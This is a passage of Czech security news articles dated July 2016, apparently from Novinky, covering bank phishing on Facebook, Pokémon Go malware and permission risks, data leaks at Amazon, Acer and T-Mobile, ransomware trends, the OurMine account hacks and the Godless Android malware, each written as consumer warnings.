Hra se těší tak nebývalé popularitě především proto, že hráči musí aktivně hledat pokémony ukryté různě po městě. Stačí spustit aplikaci v chytrém telefonu a podle mapy pak vyrazit na lov. Samotný odchyt pak probíhá prostřednictvím zabudované kamery v mobilu nebo tabletu. Přes displej mobilního zařízení totiž ve skutečném prostoru uživatelé virtuální příšerky vidí.

Za vývojem titulu Pokémon Go stojí vývojářské studio Niantic, které získalo licenci od společnosti Nintendo.


Slibují 400 Kč. Místo toho lidem vybílí účet

27.7.2016 Zdroj: Novinky/Bezpečnost Podvod
Starý trik oprášili během víkendu počítačoví piráti. Vydávají se za zástupce banky a důvěřivcům nabízejí vyzkoušení nového internetového bankovnictví. Za to jim slibují i finanční bonus. Ve skutečnosti jde však o podvod, jak varovali v noci ze soboty na neděli zástupci České spořitelny.
Podvodná nabídka na Facebooku
Podvodná nabídka na Facebooku
Podvodná nabídka cílí právě na klienty spořitelny. A kyberzločinci si tuto banku patrně nevybrali náhodou, protože Česká spořitelna o víkendu skutečně své internetové bankovnictví, tedy službu Servis24 vylepšovala.

Někteří uživatelé se tak mohli nechat napálit proto, že podvodná nabídka na sociální síti Facebook je odkazem na skutečně novou verzi internetového bankovnictví.

Neklikat, nevyplňovat
I s ohledem na to se zástupci banky od finančního bonusu okamžitě distancovali.

„Upozorňujeme na podvodný profil na Facebooku, který se snaží vzbudit dojem, že patří České spořitelně. Podvodníci na tomto profilu nabízejí ‚nové internetové bankovnictví SERVIS 24‘,“ stojí ve varování banky.

Falešnou službu Servis24 je možné poznat podle chybné webové adresy.
Falešnou službu Servis24 je možné poznat podle chybné webové adresy.
FOTO: Česká spořitelna

Skutečná podoba služby Servis 24
Skutečná podoba služby Servis 24
FOTO: Novinky

„Důrazně varujeme před jakoukoliv reakcí na výzvy uvedené na tomto profilu. V žádném případě neklikejte na nabízený odkaz a svoje údaje nevyplňujte nikam jinam než na oficiální stránky www.servis24.cz. Podvodníci by se jinak mohli dostat k vašim penězům,“ konstatovali zástupci České spořitelny.

Právě podle webové adresy totiž uživatelé mohli poznat, že jde o podvod. Odkaz na Facebooku totiž směřoval na stránky servis24.ic.cz.

Stejný trik zkoušeli už dřív
Pokud uživatelé podvodníkům naletěli, měli by co nejdříve kontaktovat svou banku. „V případě jakýchkoli pochybností nás kontaktujte na bezplatném telefonním čísle 800 207 207,“ uvedli zástupci České spořitelny.

Obezřetní by v případě podobných nabídek měli být také uživatelé jiných bankovních institucí. Není totiž vyloučeno, že stejný trik budou počítačoví piráti zkoušet příště pod hlavičkou úplně jiné společnosti.

Prostřednictvím Facebooku se počítačoví piráti nesnaží uživatele tuzemských bankovních institucí napálit poprvé. Prakticky na chlup stejnou taktiku zkoušeli také minulý měsíc. 

Ukázka podvodné reklamy na Facebooku
Ukázka podvodné reklamy na Facebooku


Neoficiální verze hry Pokémon Go mohou obsahovat viry, varovali tvůrci

27.7.2016 Zdroj: Novinky/Bezpečnost Mobilní
Tvůrci titulu Pokémon Go varovali uživatele, že by neměli stahovat neoficiální verze této hry. Podle nich se totiž nebývalé popularity novinky snaží využít i počítačoví piráti, kteří prostřednictvím neoficiálních verzí mohou šířit škodlivé kódy.
„Doporučujeme instalovat Pokémon Go pouze prostřednictvím oficiálních obchodů Google Play a App Store. Stažení z jiných zdrojů může představovat riziko,“ varovali vývojáři ze studia Niantic.

Novinka je od minulého týdne dostupná pouze ve vybraných zahraničních státech. Zájem o Pokémon Go je ale tak vysoký, že návody na stažení titulu i v jiných zemích se šíří internetem doslova jako lavina.

Lidé mají o novinku takový zájem, že jsou ochotni instalovat neoficiální verzi hry klidně i z neznámých zdrojů. A to platí i o Češích, v tuzemsku totiž hra stále není oficiálně dostupná, přestože ji již celá řada lidí hraje.

Na první pohled přitom uživatelé nemusí vůbec poznat, že je neoficiální verze aplikace nějak závadná. Nezvaný návštěvník k ní může být pouze přibalen, ve smartphonu pak může potají odchytávat SMS zprávy nebo přihlašovací údaje k různým službám, a to včetně internetového bankovnictví.

Do města i terénu
Hra se těší tak nebývalé popularitě především proto, že hráči musí aktivně hledat pokémony ukryté různě po městě. Stačí spustit aplikaci v chytrém telefonu a podle mapy pak vyrazit na lov. Samotný odchyt pak probíhá prostřednictvím zabudované kamery v mobilu nebo tabletu. Přes displej mobilního zařízení totiž ve skutečném prostoru uživatelé virtuální příšerky vidí.

Za vývojem titulu Pokémon Go stojí vývojářské studio Niantic, které získalo licenci od společnosti Nintendo. To už čelí kvůli novému titulu prvním problémům. Jak se totiž ukázalo, tvůrci měli díky hře přístup k osobním datům a nastavením uživatelských účtů na Googlu. 

Stále populárnější hra už podle BBC řadu lidí vystavila nebezpečným situacím. Někteří lidé si totiž způsobili zranění, když v mnohdy nepřehledném terénu nevěnovali pozornost svým krokům a sledovali displej mobilu.

 


Hra Pokémon Go představuje bezpečnostní riziko. Tvůrci se mohou zmocnit cizích účtů

27.7.2016  Zdroj: Novinky/Bezpečnost Mobilní
Nebývale populární hra Pokémon Go je ke stažení teprve pár dní a tvůrci již byli nuceni řešit první bezpečnostní incident. Ukázalo se totiž, že hráči nevědomky dávali kompletní přístup ke svým účtům na Googlu. Tvůrci tak teoreticky mohli číst e-maily nebo měnit nastavení.
Hra Pokémon Go vzbudila velký rozruch především mezi hráči. K dispozici je od konce minulého týdne a za pouhých pár dní si ji stáhly milióny lidí.

Ti mohou prostřednictvím svých mobilních zařízení hledat pokémony ukryté různě po městě. Stačí spustit aplikaci v chytrém telefonu a pak pomocí zabudované kamery v prostoru hledat, kde se malé roztomilé příšerky ukrývají.

Ukázka z aplikace Pokémon GO
Ukázka z aplikace Pokémon Go
FOTO: David Ryneš, Novinky

Hra je ke stažení zadarmo. Jediné, co uživatelé potřebují, je herní účet. Prostřednictvím něj pak pokémony sbírají. Zaregistrovat se je buď možné na stránkách hry, nebo využít rychlejší způsob – přihlásit se pomocí svého e-mailu na Googlu.

Tato možnost přitom platí nejen pro uživatele Androidu, ale například také platformy iOS od Applu. Přihlašovat se pomocí e-mailu mohou také majitelé iPhonů.

Právě možnost přihlášení prostřednictvím účtu na Googlu ale nadzvedla bezpečnostní experty ze židle, jak upozornil server Neowin. Po přihlášení totiž uživatelé dávají tvůrcům k dispozici kompletní přístup ke svému účtu na Googlu. Ti pak teoreticky mohou číst všechny e-maily nebo například měnit různá nastavení.

Oprava zatím chybí
Za vývojem titulu Pokémon Go stojí vývojářské studio Niantic, které získalo licenci od společnosti Nintendo. Zástupci studia již potvrdili, že k osobním datům a nastavením skutečně mohou mít přístup. V žádném případě však prý nebyla žádná data zneužita.

Podle tvůrců jde o chybu, která bude opravena při nejbližší možné aktualizaci aplikace. Kdy se tak stane, však neprozradili.

V současnosti tak milióny fanoušků, kteří titul Pokémon Go hrají, dávají své důvěrné údaje všanc.


Nejbezpečnější router jde do výroby. Vytvořili jej Češi

27.7.2016  Zdroj: Novinky/Bezpečnost Zabezpečení
V tomto týdnu odstartovala výroba údajně nejbezpečnějšího routeru na světě, který by měl zamezit hackerům a škodlivým programům v přístupu do domácí sítě. Není bez zajímavosti, že za zmiňovaným projektem Turris Omnia stojí čeští tvůrci.
BEZ KOMENTÁŘE: Co se skrývá pod plastovým krytem? Hardwarová výbava routeru Turris Omnia
Jak funguje Turris Omnia? Uživatel se nemusí o nic starat

Práce na projektu Turris započaly v roce 2013, tehdy vznikly i první routery, které byly testovány na omezeném množství českých uživatelů.
Na první pohled vypadá Turris Omnia jako obyčejný router, uvnitř nenápadné bílé krabičky se ale ukrývají pokročilé technologie. Zařízení pohání dvoujádrový procesor Marvell Armada 385, který je taktovaný na 1,6 GHz, a 1 GB operační paměti. Dále jsou k dispozici dva USB 3.0 konektory či slot na SIM kartu.
Vše navíc pracuje pod operačním systémem Turris Omnia, díky kterému dokáže router rychle reagovat pomocí aktualizace systému na aktuální hrozby. Aktualizace přitom přichází přímo od sdružení CZ.NIC, uživatel se nemusí o nic starat. Pro ještě vyšší zabezpečení je novinka vybavena speciálním čipem, jenž se stará o šifrování a identifikaci routeru.
úterý 12. července 2016, 15:25
Unikátní router Turris Omnia pochází z dílen sdružení CZ.NIC, které je správcem české národní domény.

Právě šéf sdružení Ondřej Filip v pondělí potvrdil, že jde novinka do výroby. „Posledních deset dnů jsme strávili testováním předvýrobních prototypů. Ignorovali jsme přitom víkend i svátky, vše jsme podřídili testování. Vše se zdá být perfektní, výroba tedy může začít,“ prohlásil Filip.

„Nečekejte však, že dodávky routeru započnou hned zítra. Celý proces výroby bude trvat několik týdnů,“ konstatoval šéf sdružení CZ.NIC. Prvních zařízení se tak zákazníci dočkají pravděpodobně v průběhu září.

Lidé poslali milióny
V první vlně se vyrobí tisíce routerů, které získají přednostně lidé, kteří si je objednali už na konci loňského roku prostřednictvím crowfundingového serveru Indiegogo.com. Právě ten nápadití jedinci a malé podniky využívají k získání potřebných financí pro rozjetí masové výroby.

Na zmiňovaném serveru zaujala novinka tisíce lidí, díky čemuž si čeští tvůrci připsali na svůj účet přesně milión a 518 amerických dolarů, tedy v přepočtu více než 24 miliónů korun. Právě tyto prostředky posloužily k tomu, aby mohla výroba začít.

Router mimochodem dostane každý, kdo přispěl v kampani na serveru Indiegogo částkou alespoň 179 dolarů (4500 Kč). 

Lze předpokládat, že za podobnou cenu se nakonec novinka objeví i ve volném prodeji.


Hacker se chlubí, že získal údaje o desítkách tisíc uživatelů Amazonu

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Hacker vystupující na internetu pod přezdívkou 0x2Taylor se podle všeho naboural na jeden ze serverů společnosti Amazon. Podařilo se mu z něj odcizit osobní údaje o desítkách tisíc uživatelů elektronických čteček a tabletů Kindle.
Hacker prý nalezl hned několik bezpečnostních chyb, které mohly být kýmkoliv zneužity. Proto na ně upozornil zástupce společnosti Amazon.

Když se ani po třech dnech nikdo z technické podpory neozval, rozhodl se 0x2Taylor jednat. Sám podnikl útok na server Amazonu, během kterého se údajně zmocnil více než 80 000 osobních údajů. K dispozici má údajně přihlašovací údaje, ale například i telefonní čísla a adresy uživatelů.

„Je to opravdu velká společnost a měla by mít dostatek peněz, aby si zajistila správnou obranu,“ uvedl hacker podle serveru Security Affairs.

Data uživatelů skončila na internetu
Sám zároveň přiznal, že za objevení chyb požadoval po Amazonu částku 700 dolarů, tedy více než 17 tisíc korun. Firmy totiž zpravidla takto velkými sumami hackery skutečně odměňují, pokud je upozorní na nějaké závažné chyby.

Amazon však žádný odměňovací program pro počítačové piráty nemá. To je pravděpodobně i jeden z hlavních důvodů, proč na žádost hackera nikdo nereagoval.

Příliš eticky se ale nakonec 0x2Taylor nezachoval. Data 80 000 uživatelů totiž zveřejnil na internetu, stáhnout si je tak nyní může prakticky kdokoliv.

Amazon útok nepotvrdil
Společnost Amazon zatím únik dat oficiálně nepotvrdila. Zatím tedy bohužel není jasné, zda k útoku skutečně došlo.

V minulosti se již totiž několikrát stalo, že se počítačoví piráti chlubili i prací, kterou neodvedli. Zkraje května se například jeden hacker snažil rozprodat databázi 272 miliónů odcizených hesel. Nakonec se ale ukázalo, že šlo o podvod. 

Z preventivních důvodů by si i přesto měli uživatelé zařízení Kindle změnit svá přístupová hesla. V případě, že stejná hesla používají i na jiných službách, změna by se měla týkat i jich. Pro počítačové piráty totiž není nic jednoduššího než odcizené údaje vyzkoušet na jiných webových službách.


Jak firmy ztrácejí cenná data a phishingová kampaň na iTunes

27.7.2016 Zdroj: Novinky/Bezpečnost Phishing
Svět bezpečnostních technologií se prudce vyvíjí a s ním i hrozby, kterým musí čelit. Pojďme se podívat na nejdůležitější události uplynulých dní, jak je zachytili bezpečnostní experti společnosti ESET.
Zaměříme se na podrobné informace o nejčastějších příčinách ztráty firemních dat, vylepšení dvoufaktorové autentizace společnosti Google, závažný únik dat u společnosti Acer a další phishingovou kampaň zaměřenou na zákazníky společnosti Apple.

Nejčastější důvody ztráty firemních dat
Josep Albors ze společnosti ESET popsal některé z hlavních příčin ztráty firemních dat, spojované s poškozením zařízení – například při pádu z výšky na zem. „Pokud hrozí, že dojde k takové události, která by mohla společnost dostat do vážných problémů, když včas nezareaguje adekvátním způsobem, je nejlepším řešením myslet včas na prevenci a zajistit patřičná opatření pro obnovu ztracených dat v co nejkratší možné době,“ říká Josep Albors.

Google zjednodušil dvoufaktorovou autentizaci
Společnost Google oznámila, že výrazně zjednodušila proces ověřování identity pomocí dvoufaktorové autentizace. Uživatelům bude na jejich zařízení chodit dotaz, zda se pokoušejí připojit na svůj účet. Jediné, co budou muset udělat, je potvrzení „ano“ nebo „ne“. Nastavení této služby je velmi jednoduché, zároveň jde o vysoce efektivní vyšší úroveň zabezpečení soukromí.

Kyberútoky mají být zahrnuty do mezinárodního humanitárního práva
Nejnovější zpráva Globální komise pro správu internetu uvádí, že závažnost dopadů kybernetických útoků začíná být tak velká, že by měly být zahrnuty do mezinárodního humanitárního práva. Podle autorů zprávy je vzájemné propojení zařízení využivajících internet a samotné ekonomiky tak velké, že potenciální dopad kybernetického útoku vyvolaného vládou některého státu by byl obrovský.

Zakladatel Facebooku Mark Zuckerberg si přelepuje páskou webkameru
Selfie snímek zakladatele Facebooku Marka Zuckerberga pořízený u příležitosti dosažení mety 500 miliónů uživatelů měsíčně u sociální sítě Instagram vyvolal nečekané diskuse. Ukázalo se, že šéf Facebooku je velmi opatrný, pokud jde o jeho bezpečnost a soukromí – notebook v pozadí, který velmi pravděpodobně patří právě Zuckerbergovi, měl přelepenou webkameru i audio vstup.

Acer zaznamenal závažný únik dat
Prakticky každý den se dozvídáme o nových případech závažných úniků citlivých dat. Nejnovější obětí hackerů se stala společnost Acer, která podle médií podala podnět kalifornskému Úřadu generálního prokurátora kvůli narušení databáze svých zákazníků. Předpokládá se, že útok mohl ovlivnit až 34 500 klientů Aceru.

Hackeři tvrdí, že zavirovali databázi iTunes
Kyber zločinci se opět zaměřili na zákazníky společnosti Apple a pokusili se proniknout do jejich účtů, aby získali informace o online platbách. Nejnovější případ se týká podvodného varování před virem v databázi obchodu iTunes. Bezpečnostní expert Graham Cluley popsal, že oběti útoku jsou vyzvány, aby „znovu ověřily údaje o účtu“ a zadali přihlašovací údaje, osobní data a nakonec i informace o platbách v tomto eshopu.


Americká vláda musí posílit kyberbezpečnost, prohlásil Obama

27.7.2016 Zdroj: Novinky/Bezpečnost Zabezpečení
Vláda Spojených států musí v době moderních technologií a věku chytrých telefonů posílit svou kybernetickou bezpečnost. V neděli to během návštěvy Španělska prohlásil americký prezident Barack Obama, který mimo jiné potvrdil, že do systémů Bílého domu pronikli hackeři.
„Jsem z toho znepokojen, nemyslím si, že ji (kybernetickou bezpečnost) máme bezchybnou. Musíme se více snažit, musíme se učit z chyb," řekl Obama na tiskové konferenci v Madridu. „Víme, že jsme měli v Bílém domě hackery," dodal.

O průniku do počítačových systémů sídla amerického prezidenta se již několikrát spekulovalo. Například letos v dubnu list The New York Times s odvoláním na nejmenované americké představitele uvedl, že ruským počítačovým pirátům se podařilo získat přístup k neutajovaným Obamovým e-mailům.

Obama již v sobotu hovořil v souvislosti s aférou Hillary Clintonové o tom, že ho nemile překvapilo, jak americké ministerstvo zahraničí nakládá s tajnými informacemi.

Federální úřad pro vyšetřování (FBI) zjistil, že Clintonová v době, kdy ministerstvo vedla, posílala přes svůj soukromý e-mail utajovaná data. Podle FBI se podobně lehkovážně chovali i další představitelé ministerstva.


Nebezpečný virus se šířil Facebookem. Za dva dny napadl tisíce uživatelů

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Doslova jako lavina se sociální sítí Facebook šířil před pár dny nebezpečný virus. Díky němu mohli počítačoví piráti ovládat napadené stroje, nebo dokonce odcizit internetovou identitu dotčených uživatelů – tedy vystupovat na síti jejich jménem. Před hrozbou varovali ve čtvrtek bezpečnostní analytici antivirové společnosti Kaspersky Lab.
Virus se masivně šířil přes Facebook na konci června. Tehdy obdržely tisíce nic netušících uživatelů zprávu od svých přátel s tím, že byli zmíněni v nějakém komentáři na zmiňované sociální síti. Ve skutečnosti odesílatelem nebyli přátelé, ale kyberzločinci.

Prostřednictvím zprávy se do počítače nahrál malware, jehož součástí bylo i škodlivé rozšíření pro internetový prohlížeč Chrome. Ten sloužil k zachycení přihlašovacích údajů na Facebook. Díky tomu se pak počítačoví piráti mohli vydávat za uživatele, jejichž počítače napadli, a dále šířit nebezpečný virus.

Na napadeném stroji mohli kyberzločinci podle bezpečnostních analytiků změnit nastavení soukromí na Facebooku či stahovat do počítače jakákoliv data – klidně i další škodlivé kódy. „Díky databázi přátel pak mohl šířit malware mezi další uživatele nebo například spamovat, odcizit identitu či podvodně lajkovat a sdílet obsah,“ upozornili experti z Kaspersky Lab.

Blokoval weby bezpečnostních společností
Nezvaný návštěvník byl přitom vcelku sofistikovaný. Dokázal totiž blokovat některé webové stránky a internetové služby, z napadených strojů se tak například nebylo možné přihlásit na weby poskytovatelů bezpečnostního softwaru. Tím malware znesnadňoval možnost odinstalování v případě odhalení.

Největšímu riziku byli údajně vystaveni majitelé počítačů s operačním systémem Windows, méně pak smartphonů se systémem od Microsoftu. Stroje s Androidem a iOS byly vůči útokům imunní, protože škodlivý kód využíval nekompatibilní knihovny.

Nebezpečný virus se podle studie Kaspersky Lab nejvíce šířil v Brazílii. Infikovány byly ale také některé stroje v Evropě, například v Německu či v Portugalsku. Zda nezvaný návštěvník ohrozil také tuzemské uživatele, zatím není jasné.

Facebook virus odstřihnul
V současnosti by nicméně nově objevený malware již hrozbu představovat neměl. Bezpečnostní experti Facebooku totiž již virus odstřihli tím, že zablokovali cestu používanou k jeho šíření z infikovaných strojů.

Napadené stanice je ale samozřejmě nutné ještě odvirovat. To by měla bez problémů zvládnout většina aktualizovaných antivirových programů.

Nejvíce byli postiženi uživatelé v Brazílii, Polsku, Peru, Kolumbii, Mexiku, Ekvádoru, Řecku, Portugalsku, Tunisku, Venezuele, Německu a v Izraeli.


Kyberzločinci se zaměřili na majitele webových stránek. Lákají přihlašovací údaje

27.7.2016  Zdroj: Novinky/Bezpečnost Podvod
Počítačoví podvodníci se tentokrát zaměřili na majitele různých internetových domén. V nevyžádaných e-mailech jim tvrdí, že potřebují ověřit jejich domény. Ve skutečnosti se však snaží pouze vylákat přihlašovací údaje. Na novou vlnu spamových zpráv upozornil registrátor Forpsi. Právě na jeho klienty je totiž útok cílen.
„Musíme zkontrolovat Forpsi domény, laskavě klikněte zde pro kontrolu nyní,“ tvrdí podvodníci ve phishingové zprávě.

Pod slůvkem zde se přitom ukrývá odkaz na podvodné webové stránky, které jsou hostované na italském serveru elenamagnelli.it. Není nicméně vyloučeno, že v dalších zprávách budou kyberzločinci používat odkazy i na jiné weby.

„Na zaslaný link neklikejte, stránka obsahuje falešný přihlašovací formulář. V žádném případě do formuláře nezadávejte své přihlašovací údaje,“ stojí v prohlášení společnosti Forpsi, která na nový podvod upozornila.

Mohou přesměrovat internetový provoz
Pokud uživatelé své přihlašovací údaje vyplnili, měli by si co nejdříve změnit heslo, případně kontaktovat technickou podporu.

S přihlašovacími údaji mohou počítačoví piráti přesměrovávat provoz internetových stránek na podvodné weby, měnit různá nastavení nebo se dostat i k datům uloženým na FTP.

Heslo se vyplatí změnit i v případě, kdy uživatelé používají stejné přihlašovací údaje na jiných internetových službách. Pro útočníky totiž není nic jednoduššího než odcizené jméno a heslo vyzkoušet i na dalších webech.


Podvodníci se vydávají za pracovníky ČOI, snaží se vylákat peníze

27.7.2016 Zdroj: Novinky/Bezpečnost Podvod
Česká obchodní inspekce (ČOI) upozornila na podvodné e-maily, které jsou rozesílány jejím jménem. Obsah e-mailu vzbuzuje zdání, že jde o oficiální kontrolu ČOI. V e-mailech přitom stojí, že během „kontroly” stránek podnikatele či živnostníka byly zjištěny údajné nedostatky a je nabízena pomoc za úplatu. ČOI to uvedla v tiskové zprávě.
"ČOI zaznamenala v posledních hodinách velký počet stížností a dotazů na nevyžádané maily, které jsou rozesílány z e-mailové adresy kontrola@wwwcoi.cz. Tyto e-maily nejsou odesílány z České obchodní inspekce," uvedl mluvčí inspekce Jiří Fröhlich.

ČOI doporučuje podnikatelům na tyto e-maily nereagovat. Vyzvala také ty, kteří takový e-mail obdrželi, aby na něj inspekci upozornili. "Veškerá podání v této věci budou následně hromadně předána Policii ČR pro podezření z naplnění skutkové podstaty trestného činu podvodu," dodal Fröhlich.


Bezpečnostní programy mají kritické chyby, které mohou zneužít kyberzločinci

27.7.2016  Zdroj: Novinky/Bezpečnost Zranitelnosti
Počítačoví experti uživatelům neustále kladou na srdce, jak důležité je používat antivirové programy a další bezpečnostní nástroje. Ani takovým aplikacím se ale nevyhýbají chyby, které mohou být nakonec zneužity počítačovými piráty. Na vlastní kůži se o tom přesvědčili vývojáři společnosti Symantec.
Ve více než dvou desítkách programů této společnosti, které měly uživatele chránit před nebezpečnými viry a počítačovými piráty, byly nalezeny nebezpečné trhliny. Ty obsahovaly produkty Symantec i Norton.

Konkrétně zranitelnosti byly objeveny v programech Norton Security, Norton 360, Symantec Endpoint Protection, Symantec Email Security, Symantec Protection Engine a řadě dalších. Problém se přitom netýká pouze operačního systému Windows, ale i dalších platforem.

Propašovat mohli libovolný virus
Chyby mohli kyberzločinci zneužít k propašování prakticky libovolného škodlivého kódu na cizí počítače. Bez jakýchkoliv sofistikovaných technik tak na napadených strojích mohli odposlouchávat uživatele, případně přistupovat k jejich datům.

„Objevené zranitelnosti jsou tak špatné, jak jen to jde. Piráti se mohli dostat na cizí počítače bez jakékoliv interakce uživatele,“ přiblížil riziko nebezpečných trhlin bezpečnostní expert Pierluigi Paganini na serveru Security Affairs.

Společnost Symantec naštěstí vydala pro objevené trhliny aktualizace. S ohledem na možná rizika by s jejich instalací uživatelé neměli otálet.


Úřad prověří krádež dat T-Mobilu, firmě hrozí pokuta až 10 miliónů

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Úřad pro ochranu osobních údajů (ÚOOÚ) zahájil správní řízení s mobilním operátorem T-Mobile kvůli tomu, že jeden ze zaměstnanců společnosti ukradl osobní údaje klientů. Ochránci dat firmu podezírají z nedostatečných bezpečnostních opatření. Hrozí jí až desetimiliónová pokuta.
Jeden ze zaměstnanců operátora T-Mobile ukradl osobní údaje klientů a prodával je dál. Únik dat vyšetřuje policie, která propuštěného zaměstnance už obvinila. Napsala to začátkem června Mladá fronta Dnes (MfD), které to potvrdila mluvčí operátora Martina Kemrová.

Podle deníku se případ stal v dubnu a jde v něm o údaje zhruba 1,5 miliónu zákazníků. 

V případě porušení zákona o ochraně osobních údajů může úřad uložit právnické osobě pokutu až 10 miliónů korun, uvedl již dříve k případu mluvčí ÚOOÚ David Pavlát.

Zákon o elektronických komunikacích podle úřadu ukládá povinnost mít zpracován technicko-organizační systém, a to včetně dokumentace na zajištění ochrany údajů a důvěrnosti komunikací.

Hesla prý neukradl
Charakter odcizené databáze byl podle mluvčí T-Mobile marketingový. "Nešlo o data lokalizační či provozní ani o citlivé údaje typu hesel. Jediné nebezpečí, které by hypoteticky mohlo našim zákazníkům hrozit, je případně oslovení nevyžádanými marketingovými nabídkami," uvedla.

ÚOOÚ upozornil, že lidé, kteří mají důvodné obavy o bezpečnost svých osobních údajů a chtějí zjistit, zda se jich únik týká a případně v jakém rozsahu, se mohou obrátit s žádostí o vysvětlení přímo na T-Mobile. Bližší informace, jak žádost podat, jsou na webových stránkách ÚOOÚ v sekci Poradna.

T-Mobile je s šesti milióny mobilních zákazníků největší mobilní operátor v zemi. Patří do skupiny Deutsche Telekom.


Vyděračské viry útočí stále častěji

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Na pozoru by se měli mít uživatelé před vyděračskými viry. Mezi počítačovými piráty jsou totiž tyto škodlivé kódy stále více populární. Od dubna 2015 do března 2016 bylo zaznamenáno více než 700 tisíc útoků těchto nezvaných návštěvníků. Vyplývá to z analýzy antivirové společnosti Kaspersky Lab.
O rok dříve přitom bylo zaznamenáno pětkrát méně útoků virů z rodiny ransomware – tedy vyděračských škodlivých kódů.

Útoky vyděračských virů mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.

Ani po zaplacení výkupného se uživatelé ke svým datům nemusí dostat. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A v některých případech to dokonce nejde vůbec.

Placení výkupného je pro počítačové piráty v podstatě motivací k dalším útokům, upozornil server The Hacker News. Relativně snadný zisk jim pouze potvrdí to, že podobné útoky se jim vyplatí.

Ve hře jsou miliardy
Tak velké popularitě se vyděračské viry těší především proto, že jsou pro piráty velmi výhodným byznysem. Podle odhadů amerického Federálního úřadu pro vyšetřování (FBI) jeden konkrétní škodlivý virus vydělal počítačovým pirátům miliardy. 

Počítačoví piráti si měli přijít na velké peníze díky škodlivému kódu zvanému TeslaCrypt. Jen za první čtvrtletí letošního roku jim tento nezvaný návštěvník vydělal podle odhadů FBI více než 200 miliónů dolarů, tedy v přepočtu bezmála pět miliard korun.

V současnosti již TeslaCrypt hrozbu nepředstavuje, protože útočníci zveřejnili dešifrovací klíč a uživatelům se za způsobené problémy omluvili.

Peníze ale samozřejmě nikomu nevrátili. A nic nenasvědčuje tomu, že by se miliardy nebo samotné počítačové piráty vyšetřovatelům podařilo vypátrat. Slehla se po nich zem.

Pozor na mobily a chytré televizory
Ostražití by před vyděračskými viry neměli být pouze majitelé klasických počítačů. Loni v červnu bezpečnostní experti odhalili nezvaného návštěvníka, který požadoval výkupné i na mobilním telefonu. 

Minulý měsíc pak začal internetem kolovat nezvaný návštěvník, který výše popsaným způsobem dokáže zamknout i chytrý televizor. Za jeho odemčení pak požadují podvodníci opět výkupné.


Hackeři si došlápli na šéfa Googlu, nabourali se na jeho Twitter

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Hackerská skupina OurMine se v posledních týdnech zaměřuje na napadání účtů známých osobností, a to především z toho technologického světa. Na začátku června získala přístup na některé internetové účty šéfa Facebooku Marka Zuckerberga, nyní se jí podařilo úspěšně proniknout na twitterový účet šéfa Googlu Sundara Pichaie.
Hackeři se na mikroblogovací síť Twitter dostali oklikou. Využili již dříve objevené chyby oblíbené služby Quora, kterou Pichai také používá. Ta si mezi uživateli vysloužila popularitu především tím, že sdružuje nepřeberné množství odpovědí na různorodé otázky.

Přes servery služby Quora se počítačoví piráti dostali až na Twitter hlavy Googlu. Pak již útok pokračoval klasickým způsobem, jménem Pichaie hackeři zveřejnili na jeho Twitteru zprávu o tom, že byl jeho účet napaden.

„Pouze testujeme vaše zabezpečení,“ uvedli hackeři na sociální síti Twitter. Zprávu, kterou Pichai ve skutečnosti nepsal, mohlo vidět přes půl miliónu lidí. Právě tolik lidí totiž šéfa Googlu na zmiňované mikroblogovací síti sleduje.

Čestní hackeři
Skupina OurMine postupuje při svých hackerských útocích poměrně čestně. Nikdy nemění uživatelům hesla a jejím hlavním cílem je skutečně pouze upozornit na to, že zabezpečení uživatelů může být narušeno.

To koneckonců udělala i v případě šéfa Facebooku Marka Zuckerberga, na jehož účty se dostala na začátku června. Využila k tomu databázi uniklých hesel ze služby LinkedIn. Přestože to bezpečnostní experti důrazně nedoporučují, Zuckerberg používal na různých službách jedno stejné heslo.

Na přelomu května a června se pak skupině OurMine podařilo získat přístup k internetovým účtům zakladatele Microsoftu Billa Gatese či zpěváka Christiana Collinse.

Minulý týden pak úspěšně napadla twitterový účet Dicka Costola, bývalého šéfa mikroblogovací sítě Twitter.

Podle dřívějšího prohlášení pro server The Next Web má skupina OurMine pouze tři členy a pochází ze Saúdské Arábie.


Nebezpečný virus infikoval stovky tisíc mobilů a tabletů

27.7.2016  Zdroj: Novinky/Bezpečnost Viry
Národní bezpečnostní tým CSIRT.CZ varoval před novým virem, který se zaměřuje výhradně na mobilní zařízení. V různých koutech světa zvládnul nakazit už několik stovek tisíc tabletů a chytrých telefonů. V nich přitom dokáže udělat poměrně velkou neplechu.
Nezvaný návštěvník se jmenuje Godless, což v překladu znamená neznaboh či bezbožník. Soustředí se přitom výhradně na zařízení vybavená operačním systémem Android. „Tento malware umí využít několik postupů k získání vyšších oprávnění,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

To jinými slovy znamená, že útočníci mohou získat nad napadeným přístrojem absolutní kontrolu. Mohou do něj propašovat prakticky jakýkoliv jiný škodlivý kód, mohou odposlouchávat komunikace či odchytávat přihlašovací údaje uživatelů.

Naváže se na legitimní aplikace
Doposud stihnul Godless nakazit více než 850 tisíc přístrojů po celém světě, v ohrožení je ale daleko více uživatelů. „Podle výzkumu specialistů firmy TrendMicro je schopen infikovat zhruba 90 % všech smartphonů se systémem Android 5.1 nebo starší verzí,“ podotkl Bašta.

Podle něj se škodlivý kód dokáže navázat na legitimní aplikace, takže si jej uživatelé mohou stáhnout do mobilního telefonu nebo počítačového tabletu, aniž by o tom měli ponětí. Virus se přitom kyberzločincům podařilo propašovat už i do oficiálního obchodu společnosti Google.

Ani stahování aplikací z oficiálních zdrojů tak není pro uživatele zárukou 100% bezpečí.

Škodlivých kódů pro mobily přibývá
Nárůst mobilních hrozeb je v posledních měsících stále patrnější. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad. 

